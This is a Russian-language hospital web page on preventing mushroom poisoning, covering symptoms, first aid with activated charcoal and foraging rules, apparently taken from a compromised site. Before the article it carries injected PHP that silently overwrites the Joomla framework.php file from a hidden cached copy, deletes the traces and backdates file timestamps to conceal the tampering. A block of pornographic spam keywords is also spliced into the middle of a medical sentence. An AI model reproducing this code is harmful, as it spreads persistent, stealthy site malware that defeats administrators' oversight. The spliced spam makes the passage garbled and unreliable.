$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Профилактика отравления грибами

Последние новости

Профилактика отравления грибами

PDF Печать E-mail

      Осень – сезон сбора грибов, а значит, и повышенного риска отравления грибами. Ежегодно санитарные врачи предупреждают население об опасности отравления грибами, но заболеваемость и летальность при этом не уменьшаются. 
       Токсины различных грибов по-разному действуют на организм,  вызывая разные последствия. Нередко при несвоевременной и  недостаточной помощи пострадавший погибает в короткие сроки.  Дети  более восприимчивы к действию токсинов грибов. 
 
 
          Отравление грибами может произойти при употреблении в пищу    ядовитых грибов (мухомор, ложный опенок, бледная поганка,    ложный шампиньон и т. д.) или съедобных, но испорченных грибов  (заплесневелые, покрытые слизью, долго хранившиеся). Самым  опасным для жизни грибом является бледная поганка. Смерть  может  наступить даже от употребления 1 гриба.
          На 2-3-и сутки может появиться желтуха, печеночно-почечная  недостаточность, задержка мочи, обмороки. В редких случаях  может  возникнуть печеночная кома, Mature Porn
naked celebrities
cartoon porn
celeb sex video
milfporn
celebrity sextapes
celebrity nudes
celeb sex tapes
gay hentai
часто приводящая к смерти.
       Признаками отравления грибами являются: тошнота; непрекращающаяся рвота; обильное слюноотделение; сильная потливость; возрастающая слабость; одышка; головокружение; сильные боли в животе; головная боль; жидкий стул (иногда с кровью).
    Если при отравлении произошло поражение центральной нервной системы, то наблюдаются следующие признаки: судороги; нарушения зрения; возбуждение; бред; галлюцинации.
    В случае если после приема грибов у кого-либо в семье появляются признаки поражения желудочно-кишечного тракта, не следует полагаться на домашние средства. Помните, поздно начатое лечение (на 2 - 5 сутки) в большинстве случаев безуспешно!
    Если эти симптомы выражены особенно сильно, а помощь не оказана своевременно, то пациент может погибнуть еще на этом этапе, до поражения печени.
      Главным принципом доврачебной медицинской помощи при отравлении грибами является деконтаминация – удаление не всосавшегося токсина. Важно вызвать рвоту (если не было самопроизвольной рвоты) и промыть желудок, выпить воды с активированным углем (важно чтобы она оставалась в желудке некоторое время). Количество активированного угля должно быть достаточным – не менее 0,5-1 г/кг массы тела (40-
60 г для
взрослого человека). Если диарея отсутствует, к активированному углю можно добавить слабительное средство (наиболее простое и доступное средство – сорбит – 1-2 г/кг массы тела в сутки в 2-3 приема в зависимости от эффекта). Для уточнения диагноза сохраняют все не съеденные грибы.
   Правила, которые необходимо соблюдать, чтобы избежать отравления грибами.
- Собирать следует только известные вам виды грибов. Неизвестные или сомнительные плодовые тела нельзя употреблять в пищу.
 - Не кладите в корзину и не покупайте переросшие, дряблые, поврежденные личинками и плесенью грибы.
- Не позволяйте детям брать ядовитые грибы в руки. Не пробуйте подозрительные грибы на вкус. Грибы - продукт скоропортящийся. Не откладывайте их переработку!
- Заготавливайте впрок только молодые грибы. Сушке подлежат: белые, подберезовики, подосиновики, маслята, моховики, козлята. Пластинчатые грибы сушить не рекомендуется. Исключение составляют опята, но при условии, что вы твердо уверены в определении этого гриба.
- Солите, сушите, маринуйте каждый вид грибов отдельно!
- Перед отвариванием тщательно отмойте грибы от частичек песка и почвы.
- Мариновать и солить можно все съедобные грибы, обязательно предварительно прокипятив их 10-15 минут.
- Никогда не покупайте грибные консервы, закрытые крышками в домашних условиях, а также сухие грибы, грибную икру, различные салаты с грибами на рынке.
- Не собирайте грибы вблизи промышленных предприятий, автомобильных трасс.
 
  Надеемся, что Вы отнесетесь серьезно к нашим предупреждениям и это поможет избежать неприятностей. 
Будьте здоровы!

 

 

Наши контакты

423812, РТ, г. Набережные Челны,Московский пр-кт, д.85
Телефоны:

Гл.врач - 58-53-55

Приемная гл. врача - 58-54-78

Справочная - 58-54-94

Приемное отделение - 58-52-02

Отделение платных услуг - 58-50-36

Горячая линия - 58-54-78

Группа VK  vk.com/infbol_nch

Факс: 58-54-78

E-mail:  infbol@mail.ru   mz.nchelny_ib@tatar.ru

  • Баннер
  • Баннер